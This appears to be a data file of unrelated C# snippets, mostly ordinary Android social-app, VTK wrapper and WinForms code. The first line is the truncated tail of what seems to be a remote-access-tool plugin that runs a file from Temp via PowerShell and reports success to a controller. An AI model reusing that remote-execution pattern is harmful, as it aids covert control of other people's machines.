Process.GetProcessesByName("powershell").Length > 0) { Packet.Log($"Temp\\{Path.GetFileName(fullPath)} execute success!"); } } } catch (Exception ex) { Packet.Error(ex.Message); } Connection.Disconnected(); }
//private AudioSource leverAud; void Start() { //leverAud = transform.parent.GetComponent<AudioSource>(); stateMethod = woodDoorMethod; }
static void Main() { Methods link = new Methods(); string a, line; int j, n, check, m; a = ""; char[] str = new char[1000]; for (int i = 0; i <= 10000; i++) { m = 1; check = 0; line = Console.ReadLine(); for (j = 0; j < line.Length; j++) { check = check + Convert.ToInt32(line[j] - '0') * m; m += 10; if (j == line.Length - 1) { break; } if (line[j + 1] == ' ') { break; } } for (j = 2; j < line.Length; j++) { a = a + line[j]; } if (check == 1) { link.Add(a); } if (check == 2) { n = Convert.ToInt32(a); link.Del(n); } if (check == 3) { n = Convert.ToInt32(a); link.Print(n); } if (check == 4) { link.Undo(); } if (check < 1 || check > 4) { Console.WriteLine("Ошибка. Команды под номером " + check + " не существует"); break; } a = ""; } }
static vtkImageDataLIC2D() { vtkImageDataLIC2D.MRClassNameKey = "class vtkImageDataLIC2D"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkImageDataLIC2D.MRClassNameKey, Type.GetType("Kitware.VTK.vtkImageDataLIC2D")); }
//Api sent Comment private async void ImgSentOnClick(object sender, EventArgs e) { try { if (string.IsNullOrEmpty(TxtComment.Text) && string.IsNullOrWhiteSpace(TxtComment.Text) && string.IsNullOrEmpty(PathImage)) { return; } if (Methods.CheckConnectivity()) { CommentObject.Replies ??= "0"; CommentObject.RepliesCount ??= "0"; //Comment Code var dataUser = ListUtils.MyProfileList?.FirstOrDefault(); var unixTimestamp = DateTimeOffset.UtcNow.ToUnixTimeSeconds(); CommentObjectExtra comment = new CommentObjectExtra { Id = unixTimestamp.ToString(), PostId = CommentObject.PostId, UserId = UserDetails.UserId, Text = TxtComment.Text, Time = unixTimestamp.ToString(), CFile = PathImage, Record = "", Publisher = dataUser, Url = dataUser?.Url, Fullurl = CommentObject?.Fullurl, Orginaltext = TxtComment.Text, Owner = true, CommentLikes = "0", CommentWonders = "0", IsCommentLiked = false, Replies = "0", RepliesCount = "0", }; MAdapter.ReplyCommentList.Add(comment); var index = MAdapter.ReplyCommentList.IndexOf(comment); switch (index) { case > -1: MAdapter.NotifyItemInserted(index); break; } MRecycler.Visibility = ViewStates.Visible; var dd = MAdapter.ReplyCommentList.FirstOrDefault(); if (dd?.Text == MAdapter.EmptyState) { MAdapter.ReplyCommentList.Remove(dd); MAdapter.NotifyItemRemoved(MAdapter.ReplyCommentList.IndexOf(dd)); } var repliesCount = !string.IsNullOrEmpty(CommentObject.RepliesCount) ? CommentObject.RepliesCount : CommentObject.Replies ?? ""; //CommentLayout.Visibility = ViewStates.Gone; bool success = int.TryParse(repliesCount, out var number); switch (success) { case true: { Console.WriteLine("Converted '{0}' to {1}.", repliesCount, number); var x = number + 1; ReplyCountTextView.Text = x + " " + GetString(Resource.String.Lbl_Replies); break; } default: Console.WriteLine("Attempted conversion of '{0}' failed.", repliesCount ?? "<null>"); ReplyCountTextView.Text = 1 + " " + GetString(Resource.String.Lbl_Replies); break; } ImgGallery.SetImageDrawable(AppSettings.SetTabDarkTheme ? GetDrawable(Resource.Drawable.ic_action_addpost_Ligth) : GetDrawable(Resource.Drawable.ic_action_AddPost)); var text = TxtComment.Text; //Hide keyboard TxtComment.Text = ""; var(apiStatus, respond) = await RequestsAsync.Comment.CreatePostCommentsAsync(CommentId, text, PathImage, "", "create_reply"); switch (apiStatus) { case 200: { switch (respond) { case CreateComments result: { var date = MAdapter.ReplyCommentList.FirstOrDefault(a => a.Id == comment.Id) ?? MAdapter.ReplyCommentList.FirstOrDefault(x => x.Id == result.Data.Id); if (date != null) { var db = ClassMapper.Mapper?.Map <CommentObjectExtra>(result.Data); date = db; date.Id = result.Data.Id; index = MAdapter.ReplyCommentList.IndexOf(MAdapter.ReplyCommentList.FirstOrDefault(a => a.Id == unixTimestamp.ToString())); MAdapter.ReplyCommentList[index] = index switch { > -1 => db, _ => MAdapter.ReplyCommentList[index] }; var commentAdapter = CommentActivity.GetInstance()?.MAdapter; var commentObject = commentAdapter?.CommentList?.FirstOrDefault(a => a.Id == CommentId); if (commentObject != null) { commentObject.Replies = commentAdapter.CommentList.Count.ToString(); commentObject.RepliesCount = commentAdapter.CommentList.Count.ToString(); commentAdapter.NotifyDataSetChanged(); } var postFeedAdapter = TabbedMainActivity.GetInstance()?.NewsFeedTab?.PostFeedAdapter; var dataGlobal = postFeedAdapter?.ListDiffer?.Where(a => a.PostData?.Id == CommentObject?.PostId).ToList(); switch (dataGlobal?.Count) { case > 0: { foreach (var dataClass in from dataClass in dataGlobal let indexCom = postFeedAdapter.ListDiffer.IndexOf(dataClass) where indexCom > -1 select dataClass) { switch (dataClass.PostData.GetPostComments?.Count) { case > 0: { var dataComment = dataClass.PostData.GetPostComments.FirstOrDefault(a => a.Id == date.Id); if (dataComment != null) { dataComment.Replies = MAdapter.ReplyCommentList.Count.ToString(); dataComment.RepliesCount = MAdapter.ReplyCommentList.Count.ToString(); } break; } } postFeedAdapter.NotifyItemChanged(postFeedAdapter.ListDiffer.IndexOf(dataClass), "commentReplies"); } break; } } var postFeedAdapter2 = WRecyclerView.GetInstance()?.NativeFeedAdapter; var dataGlobal1 = postFeedAdapter2?.ListDiffer?.Where(a => a.PostData?.Id == CommentObject?.PostId).ToList(); switch (dataGlobal1?.Count) { case > 0: { foreach (var dataClass in from dataClass in dataGlobal1 let indexCom = postFeedAdapter2.ListDiffer.IndexOf(dataClass) where indexCom > -1 select dataClass) { switch (dataClass.PostData.GetPostComments?.Count) { case > 0: { var dataComment = dataClass.PostData.GetPostComments.FirstOrDefault(a => a.Id == date.Id); if (dataComment != null) { dataComment.Replies = MAdapter.ReplyCommentList.Count.ToString(); dataComment.RepliesCount = MAdapter.ReplyCommentList.Count.ToString(); } break; } } postFeedAdapter2.NotifyItemChanged(postFeedAdapter2.ListDiffer.IndexOf(dataClass), "commentReplies"); } break; } } } break; } } break; } }
/// <summary> /// BTNs the add to want to see click. /// </summary> /// <param name="sender">The sender.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> private void BtnAddToWantToSeeClick(object sender, EventArgs e) { methods = new Methods(); var movie = new MovieTable { Director = BlockDirectors.Text, Title = TxtMovieTitle.Text, Year = Convert.ToInt32(BlockYear.Text), WantSee = true, Wish = false, UrlImage = urlImage }; methods.InsertMovie(movie); MessageBox.Show("Added to your want to see list"); NavigationService.Navigate(new Uri("/Pages/Menu.xaml", UriKind.Relative)); }
public void OnDismiss(){ this.textView = null; this.methods = null; this.currentMethod = 0; this.currentParameter = 0; this.displayed = false; }
private void RejectCallButton_Click(object sender, EventArgs e) { try { if (!Methods.CheckConnectivity()) { Toast.MakeText(this, GetString(Resource.String.Lbl_CheckYourInternetConnection), ToastLength.Short)?.Show(); return; } switch (CallType) { case "Twilio_video_call": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await RequestsAsync.Call.DeclineCallAsync(UserDetails.UserId, CallId, TypeCall.Video) }); break; case "Twilio_audio_call": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await RequestsAsync.Call.DeclineCallAsync(UserDetails.UserId, CallId, TypeCall.Audio) }); break; case "Agora_video_call_recieve": case "Agora_audio_call_recieve": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await ApiRequest.Send_Agora_Call_Action_Async("decline", CallId) }); break; } if (!string.IsNullOrEmpty(CallId)) { var ckd = MsgTabbedMainActivity.GetInstance()?.LastCallsTab?.MAdapter?.MCallUser?.FirstOrDefault(a => a.Id == CallId); // id >> Call_Id if (ckd == null) { Classes.CallUser cv = new Classes.CallUser { Id = CallId, UserId = UserId, Avatar = Avatar, Name = Name, AccessToken = TwilioAccessToken, AccessToken2 = TwilioAccessTokenUser2, FromId = FromId, Active = Active, Time = "Missed call", Status = Status, RoomName = RoomName, Type = CallType, TypeIcon = "Cancel", TypeColor = "#FF0000" }; MsgTabbedMainActivity.GetInstance()?.LastCallsTab?.MAdapter?.Insert(cv); SqLiteDatabase dbDatabase = new SqLiteDatabase(); dbDatabase.Insert_CallUser(cv); } } MsgTabbedMainActivity.RunCall = false; FinishVideoAudio(); } catch (Exception exception) { MsgTabbedMainActivity.RunCall = false; FinishVideoAudio(); Methods.DisplayReportResultTrack(exception); } }
static vtkTemporalPathLineFilter() { vtkTemporalPathLineFilter.MRClassNameKey = "class vtkTemporalPathLineFilter"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkTemporalPathLineFilter.MRClassNameKey, Type.GetType("Kitware.VTK.vtkTemporalPathLineFilter")); }
/// <summary> /// Метод стартового состояния окна /// </summary> /// <param name="x">размер по оси x</param> /// <param name="y">размер по оси y</param> public MainForm(int x, int y) { string pathDirectory = Application.StartupPath; // Путь к директории string pathFile = pathDirectory + "\\" + "eurusd" + ".txt"; // Путь к файлу c котировками eurusd Methods Time = new Methods(); // проверка интерент соединения ассинхронно tConnect = Task.Run(() => { Internet inCon = new Internet(); InetConnect.Inet = inCon.TryCon(inet, "eurusd", sync, internetActionFinished); }); switch (Time.TradeStop(DateTime.Now)) { case "Sat": MessageBox.Show("Forex day off"); break; case "Sun": MessageBox.Show("Forex day off"); break; } this.InitializeComponent(); splitContainer1.Size = new Size(x, y); splitContainer1.Location = new Point(0, 0); // Массив кнопок интерфейса Button[] LButton = {buttonEurUsd, buttonUsdJpy}; foreach (Button index in LButton) { splitContainer1.Panel2.Controls.Add(index); } // Массив меток интерфейса Label[] LLabel = { labelSelectPair }; foreach (Label index in LLabel) { splitContainer1.Panel2.Controls.Add(index); } DirectoryInsspection.Set(pathDirectory); // проверка существования директории FileInspection.Set(pathFile); // проверка существования файла this.FormClosing += new FormClosingEventHandler(OnClosing); LButton[0].Location = new Point( x / 2 - 400, y / 2 - 100); // Первая кнопка EurUsd LLabel[0].Location = new Point(x / 2 - 100, y / 2 - 200); // Метка LButton[1].Location = new Point(x / 2 + 200, y / 2 - 100); // Вторая кнопка UsdJpy xS = x / 1920.0; // настройка под все экраны yS = y / 1080.0; // настройка под все экраны this.Size = new Size(x, y); // задание размеров экрана #region Переменные командной комбинации к Меню текущей форме windowToolStripMenuItem.ShortcutKeys = Keys.Control | Keys.W; // командная комбинация клавиш для откытия настроек окна chartToolStripMenuItem.ShortcutKeys = Keys.Control | Keys.C; // командная комбинация клавиш для откытия настроек графика eURUSDToolStripMenuItem.ShortcutKeys = Keys.Control | Keys.U; // командная комбинация клавиш для откытия графика USDEUR helpToolStripMenuItem.ShortcutKeys = Keys.Control | Keys.H; // командная комбинация клавиш для откытия помощи USDJPYToolStripMenuItem.ShortcutKeys = Keys.Control | Keys.Y; // командная комбинация клавиш для откытия графика EURYPJ #endregion if (HelpClosing == true) { helpToolStripMenuItem.CheckState = CheckState.Unchecked; } Internet IPair = new Internet(); Cursor.Current = Cursors.WaitCursor; // Грузящий курсор tConnect.Wait(); Cursor.Current = Cursors.Default; // Возвращение к нормальному состоянию LoadData(IPair); // загрузка данных 2х потоков с данными №1 }
private void AcceptCallButton_Click(object sender, EventArgs e) { try { switch (CallType) { case "Twilio_video_call": { Intent intent = new Intent(this, typeof(TwilioVideoCallActivity)); intent.SetFlags(ActivityFlags.TaskOnHome | ActivityFlags.BroughtToFront); intent.PutExtra("UserID", UserId); intent.PutExtra("avatar", Avatar); intent.PutExtra("name", Name); intent.PutExtra("access_token", TwilioAccessToken); intent.PutExtra("access_token_2", TwilioAccessTokenUser2); intent.PutExtra("from_id", FromId); intent.PutExtra("active", Active); intent.PutExtra("time", Time); intent.PutExtra("CallID", CallId); intent.PutExtra("room_name", RoomName); intent.PutExtra("type", CallType); StartActivity(intent); break; } case "Twilio_audio_call": { Intent intent = new Intent(this, typeof(TwilioAudioCallActivity)); intent.SetFlags(ActivityFlags.TaskOnHome | ActivityFlags.BroughtToFront | ActivityFlags.NewTask); intent.PutExtra("UserID", UserId); intent.PutExtra("avatar", Avatar); intent.PutExtra("name", Name); intent.PutExtra("access_token", TwilioAccessToken); intent.PutExtra("access_token_2", TwilioAccessTokenUser2); intent.PutExtra("from_id", FromId); intent.PutExtra("active", Active); intent.PutExtra("time", Time); intent.PutExtra("CallID", CallId); intent.PutExtra("room_name", RoomName); intent.PutExtra("type", CallType); StartActivity(intent); break; } case "Agora_audio_call_recieve": { Intent intent = new Intent(this, typeof(AgoraAudioCallActivity)); intent.SetFlags(ActivityFlags.TaskOnHome | ActivityFlags.BroughtToFront | ActivityFlags.NewTask); intent.PutExtra("UserID", UserId); intent.PutExtra("avatar", Avatar); intent.PutExtra("name", Name); intent.PutExtra("time", Time); intent.PutExtra("CallID", CallId); intent.PutExtra("room_name", RoomName); intent.PutExtra("type", CallType); StartActivity(intent); break; } case "Agora_video_call_recieve": { Intent intent = new Intent(this, typeof(AgoraVideoCallActivity)); intent.SetFlags(ActivityFlags.TaskOnHome | ActivityFlags.BroughtToFront | ActivityFlags.NewTask); intent.PutExtra("UserID", UserId); intent.PutExtra("avatar", Avatar); intent.PutExtra("name", Name); intent.PutExtra("time", Time); intent.PutExtra("CallID", CallId); intent.PutExtra("room_name", RoomName); intent.PutExtra("type", CallType); StartActivity(intent); break; } } FinishVideoAudio(); } catch (Exception exception) { FinishVideoAudio(); Methods.DisplayReportResultTrack(exception); } }
public UnitTest() { _methods = new Methods(); }
private async void SendMess(string text) { try { if (!Methods.CheckConnectivity()) { Toast.MakeText(this, GetString(Resource.String.Lbl_CheckYourInternetConnection), ToastLength.Short)?.Show(); } else { var unixTimestamp = DateTimeOffset.UtcNow.ToUnixTimeSeconds(); var time2 = unixTimestamp.ToString(); //Here on This function will send Selected audio file to the user var(apiStatus, respond) = await RequestsAsync.Message.SendMessageAsync(UserId, time2, text); if (apiStatus == 200) { if (respond is SendMessageObject result) { Console.WriteLine(result.MessageData); if (!string.IsNullOrEmpty(CallId)) { var ckd = MsgTabbedMainActivity.GetInstance()?.LastCallsTab?.MAdapter?.MCallUser?.FirstOrDefault(a => a.Id == CallId); // id >> Call_Id if (ckd == null) { Classes.CallUser cv = new Classes.CallUser { Id = CallId, UserId = UserId, Avatar = Avatar, Name = Name, AccessToken = TwilioAccessToken, AccessToken2 = TwilioAccessTokenUser2, FromId = FromId, Active = Active, Time = "Missed call", Status = Status, RoomName = RoomName, Type = CallType, TypeIcon = "Cancel", TypeColor = "#FF0000" }; MsgTabbedMainActivity.GetInstance()?.LastCallsTab.MAdapter?.Insert(cv); SqLiteDatabase dbDatabase = new SqLiteDatabase(); dbDatabase.Insert_CallUser(cv); } } switch (CallType) { case "Twilio_video_call": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await RequestsAsync.Call.DeclineCallAsync(UserDetails.UserId, CallId, TypeCall.Video) }); break; case "Twilio_audio_call": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await RequestsAsync.Call.DeclineCallAsync(UserDetails.UserId, CallId, TypeCall.Audio) }); break; case "Agora_video_call_recieve": case "Agora_audio_call_recieve": PollyController.RunRetryPolicyFunction(new List <Func <Task> > { async() => await ApiRequest.Send_Agora_Call_Action_Async("decline", CallId) }); break; } MsgTabbedMainActivity.RunCall = false; FinishVideoAudio(); } } else { Methods.DisplayReportResult(this, respond); } } } catch (Exception e) { Methods.DisplayReportResultTrack(e); } }
void Deseri() { string xmlStr = ViNoGameSaveLoad.LoadXML( name + ".xml" ); TestData dat = ViNoGameSaveLoad.DeserializeObject<TestData>( xmlStr ) as TestData; sceneName = dat.sceneName; method = dat.method; withFadeIn = dat.withFadeIn; ViNoGameSaveLoad.CreateXML( name + ".xml" , xmlStr ); }
protected override void OnCreate(Bundle savedInstanceState) { try { base.OnCreate(savedInstanceState); SetContentView(Resource.Layout.TwilioCommingVideoCallLayout); Window.AddFlags(WindowManagerFlags.KeepScreenOn); SensorManager = (SensorManager)GetSystemService(SensorService); Proximity = SensorManager.GetDefaultSensor(SensorType.Proximity); CallActivity = this; var dataCallId = Intent?.GetStringExtra("CallID") ?? ""; if (!string.IsNullOrEmpty(dataCallId)) { CallType = Intent?.GetStringExtra("type"); switch (CallType) { case "Twilio_video_call": case "Twilio_audio_call": CallId = dataCallId; UserId = Intent?.GetStringExtra("UserID"); Avatar = Intent?.GetStringExtra("avatar"); Name = Intent?.GetStringExtra("name"); FromId = Intent?.GetStringExtra("from_id"); Active = Intent?.GetStringExtra("active"); Time = Intent?.GetStringExtra("time"); Status = Intent?.GetStringExtra("status"); RoomName = Intent?.GetStringExtra("room_name"); TwilioAccessToken = Intent?.GetStringExtra("access_token"); TwilioAccessTokenUser2 = Intent?.GetStringExtra("access_token_2"); break; case "Agora_video_call_recieve": case "Agora_audio_call_recieve": CallId = dataCallId; UserId = Intent?.GetStringExtra("UserID"); Avatar = Intent?.GetStringExtra("avatar"); Name = Intent?.GetStringExtra("name"); FromId = Intent?.GetStringExtra("from_id"); Active = Intent?.GetStringExtra("active"); Time = Intent?.GetStringExtra("time"); Status = Intent?.GetStringExtra("status"); RoomName = Intent?.GetStringExtra("room_name"); break; } } UserNameTextView = FindViewById <TextView>(Resource.Id.UsernameTextView); TypeCallTextView = FindViewById <TextView>(Resource.Id.TypecallTextView); UserImageView = FindViewById <ImageView>(Resource.Id.UserImageView); GradientPreView = FindViewById <View>(Resource.Id.gradientPreloaderView); AcceptCallButton = FindViewById <CircleButton>(Resource.Id.accept_call_button); RejectCallButton = FindViewById <CircleButton>(Resource.Id.end_call_button); MessageCallButton = FindViewById <CircleButton>(Resource.Id.message_call_button); StartAnimatedBackground(); AcceptCallButton.Click += AcceptCallButton_Click; RejectCallButton.Click += RejectCallButton_Click; MessageCallButton.Click += MessageCallButton_Click; if (!string.IsNullOrEmpty(Name)) { UserNameTextView.Text = Name; } if (!string.IsNullOrEmpty(Avatar)) { GlideImageLoader.LoadImage(this, Avatar, UserImageView, ImageStyle.CircleCrop, ImagePlaceholders.Drawable); } if (CallType == "Twilio_video_call" || CallType == "Agora_video_call_recieve") { TypeCallTextView.Text = GetText(Resource.String.Lbl_Video_call); } else { TypeCallTextView.Text = GetText(Resource.String.Lbl_Voice_call); } Methods.AudioRecorderAndPlayer.PlayAudioFromAsset("mystic_call.mp3"); Vibrator = (Vibrator)GetSystemService(VibratorService); var vibrate = new long[] { 1000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000, 1000, 2000 }; // Vibrate for 500 milliseconds Vibrator.Vibrate(VibrationEffect.CreateWaveform(vibrate, 3)); } catch (Exception e) { Methods.DisplayReportResultTrack(e); } }
public void Refresh( IVsTextView textView, Methods methods, int currentParameter, TextSpan context ) { this.methods = methods; this.context = context; // Apparently this Refresh() method is called as a result of event notification // after the currentMethod is changed, so we do not want to Dismiss anything or // reset the currentMethod here. This fixes bug #235 //Dismiss(); this.textView = textView; this.methods = methods; // TODO: We could do so much better since we have a full parse tree available // we could intelligently select the best matching method based on what the user // has already typed in !! // m_currentMethod = 0; this.currentParameter = currentParameter; this.AdjustCurrentParameter( 0 ); }
private void Initialize(SearchPageAdapterViewHolder holder, PageClass item) { try { GlideImageLoader.LoadImage(ActivityContext, item.Avatar, holder.Image, ImageStyle.CircleCrop, ImagePlaceholders.Drawable); if (!string.IsNullOrEmpty(item.PageTitle) || !string.IsNullOrWhiteSpace(item.PageTitle)) { holder.Name.Text = Methods.FunString.SubStringCutOf(Methods.FunString.DecodeString(item.PageTitle), 20); } else { holder.Name.Text = Methods.FunString.SubStringCutOf(Methods.FunString.DecodeString(item.PageName), 20); } CategoriesController cat = new CategoriesController(); holder.About.Text = cat.Get_Translate_Categories_Communities(item.PageCategory, item.Category); //var drawable = TextDrawable.InvokeBuilder().BeginConfig().FontSize(30).EndConfig().BuildRound("", Color.ParseColor("#BF360C")); //holder.ImageView.SetImageDrawable(drawable); if (item.IsLiked != null) { //Set style Btn Like page if (item.IsLiked == "no" || item.IsLiked == "No" || item.IsLiked == "false") { holder.Button.SetBackgroundResource(Resource.Drawable.follow_button_profile_friends); holder.Button.SetTextColor(Color.ParseColor(AppSettings.MainColor)); holder.Button.Text = ActivityContext.GetText(Resource.String.Btn_Like); holder.Button.Tag = "false"; } else if (item.IsLiked == "yes" || item.IsLiked == "Yes" || item.IsLiked == "true") { holder.Button.SetBackgroundResource(Resource.Drawable.follow_button_profile_friends_pressed); holder.Button.SetTextColor(Color.ParseColor("#ffffff")); holder.Button.Text = ActivityContext.GetText(Resource.String.Btn_Unlike); holder.Button.Tag = "true"; } } else { holder.Button.Visibility = ViewStates.Gone; } if (!holder.Button.HasOnClickListeners) { holder.Button.Click += (sender, args) => { try { if (!Methods.CheckConnectivity()) { Toast.MakeText(ActivityContext, ActivityContext.GetString(Resource.String.Lbl_CheckYourInternetConnection), ToastLength.Short).Show(); return; } if (holder.Button.Tag.ToString() == "false") { holder.Button.SetBackgroundResource(Resource.Drawable .follow_button_profile_friends_pressed); holder.Button.SetTextColor(Color.ParseColor("#ffffff")); holder.Button.Text = ActivityContext.GetText(Resource.String.Btn_Unlike); holder.Button.Tag = "true"; } else { holder.Button.SetBackgroundResource(Resource.Drawable.follow_button_profile_friends); holder.Button.SetTextColor(Color.ParseColor(AppSettings.MainColor)); holder.Button.Text = ActivityContext.GetText(Resource.String.Btn_Like); holder.Button.Tag = "false"; } PollyController.RunRetryPolicyFunction(new List <Func <Task> > { () => RequestsAsync.Page.Like_Page(item.PageId) }); } catch (Exception e) { Console.WriteLine(e); } } } ; } catch (Exception e) { Console.WriteLine(e); } }
static vtkWarpTransform() { vtkWarpTransform.MRClassNameKey = "class vtkWarpTransform"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkWarpTransform.MRClassNameKey, Type.GetType("Kitware.VTK.vtkWarpTransform")); }
private async Task LoadGroup(string offset) { if (SuggestedGroupScrollEvent != null && SuggestedGroupScrollEvent.IsLoading) { return; } if (Methods.CheckConnectivity()) { if (SuggestedGroupScrollEvent != null) { SuggestedGroupScrollEvent.IsLoading = true; } var countList = MAdapter.GroupList.Count; var(respondCode, respondString) = await RequestsAsync.Group.GetRecommendedGroups("10", offset); if (respondCode.Equals(200)) { if (respondString is ListGroupsObject result) { var respondList = result.Data.Count; if (respondList > 0) { if (countList > 0) { foreach (var item in from item in result.Data let check = MAdapter.GroupList.FirstOrDefault(a => a.Id == item.Id) where check == null select item) { MAdapter.GroupList.Add(item); } RunOnUiThread(() => { MAdapter.NotifyItemRangeInserted(countList, MAdapter.GroupList.Count - countList); }); } else { MAdapter.GroupList = new ObservableCollection <GroupClass>(result.Data); RunOnUiThread(() => { if (SuggestedGroupInflated == null) { SuggestedGroupInflated = SuggestedGroupViewStub.Inflate(); } RecyclerInflaterSuggestedGroup = new TemplateRecyclerInflater(); RecyclerInflaterSuggestedGroup.InflateLayout <GroupClass>(this, SuggestedGroupInflated, MAdapter, TemplateRecyclerInflater.TypeLayoutManager.LinearLayoutManagerHorizontal, 0, true, GetString(Resource.String.Lbl_SuggestedForYou), "", true); RecyclerInflaterSuggestedGroup.MainLinear.Click += MainLinearSuggestedGroupOnClick; if (SuggestedGroupScrollEvent == null) { RecyclerViewOnScrollListener playlistRecyclerViewOnScrollListener = new RecyclerViewOnScrollListener(RecyclerInflaterSuggestedGroup.LayoutManager); SuggestedGroupScrollEvent = playlistRecyclerViewOnScrollListener; SuggestedGroupScrollEvent.LoadMoreEvent += SuggestedGroupScrollEventOnLoadMoreEvent; RecyclerInflaterSuggestedGroup.Recyler.AddOnScrollListener(playlistRecyclerViewOnScrollListener); SuggestedGroupScrollEvent.IsLoading = false; } }); } } else { if (RecyclerInflaterSuggestedGroup?.Recyler != null && MAdapter.GroupList.Count > 10 && !RecyclerInflaterSuggestedGroup.Recyler.CanScrollVertically(1)) { Toast.MakeText(this, GetText(Resource.String.Lbl_NoMoreGroup), ToastLength.Short).Show(); } } } } else { Methods.DisplayReportResult(this, respondString); } RunOnUiThread(ShowEmptyPage); } else { Inflated = EmptyStateLayout.Inflate(); EmptyStateInflater x = new EmptyStateInflater(); x.InflateLayout(Inflated, EmptyStateInflater.Type.NoConnection); if (!x.EmptyStateButton.HasOnClickListeners) { x.EmptyStateButton.Click += null; x.EmptyStateButton.Click += EmptyStateButtonOnClick; } Toast.MakeText(this, GetString(Resource.String.Lbl_CheckYourInternetConnection), ToastLength.Short).Show(); if (SuggestedGroupScrollEvent != null) { SuggestedGroupScrollEvent.IsLoading = false; } } }
private void Timer_Tick(object sender, EventArgs e) { Methods methods = new Methods(); methods.GetProcessList(ProcessList); }
private void ShowEmptyPage() { try { UserTab.ProgressBarLoader.Visibility = ViewStates.Gone; PagesTab.ProgressBarLoader.Visibility = ViewStates.Gone; GroupsTab.ProgressBarLoader.Visibility = ViewStates.Gone; if (UserTab.MAdapter.UserList.Count > 0) { UserTab.EmptyStateLayout.Visibility = ViewStates.Gone; } else { UserTab.Inflated ??= UserTab.EmptyStateLayout.Inflate(); EmptyStateInflater x = new EmptyStateInflater(); x.InflateLayout(UserTab.Inflated, EmptyStateInflater.Type.NoSearchResult); if (!x.EmptyStateButton.HasOnClickListeners) { x.EmptyStateButton.Click -= EmptyStateButtonOnClick; x.EmptyStateButton.Click -= TryAgainButton_Click; } x.EmptyStateButton.Click += TryAgainButton_Click; UserTab.EmptyStateLayout.Visibility = ViewStates.Visible; } if (PagesTab.MAdapter.PageList.Count > 0) { PagesTab.EmptyStateLayout.Visibility = ViewStates.Gone; } else { PagesTab.Inflated ??= PagesTab.EmptyStateLayout.Inflate(); EmptyStateInflater x = new EmptyStateInflater(); x.InflateLayout(PagesTab.Inflated, EmptyStateInflater.Type.NoSearchResult); if (!x.EmptyStateButton.HasOnClickListeners) { x.EmptyStateButton.Click -= EmptyStateButtonOnClick; x.EmptyStateButton.Click -= TryAgainButton_Click; } x.EmptyStateButton.Click += TryAgainButton_Click; PagesTab.EmptyStateLayout.Visibility = ViewStates.Visible; } if (GroupsTab.MAdapter.GroupList.Count > 0) { GroupsTab.EmptyStateLayout.Visibility = ViewStates.Gone; } else { GroupsTab.Inflated ??= GroupsTab.EmptyStateLayout.Inflate(); EmptyStateInflater x = new EmptyStateInflater(); x.InflateLayout(GroupsTab.Inflated, EmptyStateInflater.Type.NoSearchResult); if (!x.EmptyStateButton.HasOnClickListeners) { x.EmptyStateButton.Click -= EmptyStateButtonOnClick; x.EmptyStateButton.Click -= TryAgainButton_Click; x.EmptyStateButton.Click += null !; } x.EmptyStateButton.Click += TryAgainButton_Click; GroupsTab.EmptyStateLayout.Visibility = ViewStates.Visible; } } catch (Exception e) { //SwipeRefreshLayout.Refreshing = false; Methods.DisplayReportResultTrack(e); } }